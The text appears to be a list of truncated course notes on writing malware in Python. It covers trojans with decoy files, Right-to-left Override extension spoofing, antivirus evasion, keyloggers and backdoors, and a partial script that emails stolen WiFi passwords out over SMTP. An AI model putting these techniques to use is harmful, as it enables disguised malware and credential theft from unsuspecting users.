DOWNLOAD & EXECUTE PAYLOAD A generic executable that downloads & executes files. Disadvantages: User needs internet connection. Files have to be uploaded and accessible via a direct URL. PACKAGING - CREATING TROJANS Package front file with evil fi…
TROJANS A trojan is a file that looks and functions as a normal file(image, pdf, song ..etc). When executed: 1. Opens the normal file that the user expects. 2. Executes evil code in the background (run a backdoor/keylogger ..etc). Download & Execute…
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -  adding the…
Spoofing File Extention - A trick. Use the Kali Linux Program - Characters 1. Open the program. 2. Find Right-to-left Override. 3. Copy Character and paste to the notepad. 4. Rename the evil file. 5. Note: To avoid the browser replace the character,…
BYPASSING ANTI-VIRUS PROGRAMS AV programs detect viruses based on: 1. Code - compare files to huge databases of signatures. ->Use own code, obfuscation, useless operations, encode, pack ...etc 2. Behaviour - run a file in a sandbox and analyze it. ->…
WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Report. Download, Execute & Report. KEYLOGGER A program that records keys pressed on the keyboard. REVERSE_BACKDOOR Access file system. Execute system comm…
DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. Simple but powerfull. Can be used in many situations: download _file + execute_command = download_and_execute download_file + execute_and_report = do…
Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) ser…
Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import re def send_mail(email, password, message): server = smtplib.SMTP("smtp.gmail.com", 587) server.starttls() server.login(email, password) server.se…
Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specific resources. Result: They work on any OS with a python interpreter. If packaged, they will work on any OS if even if python is NOT installed.…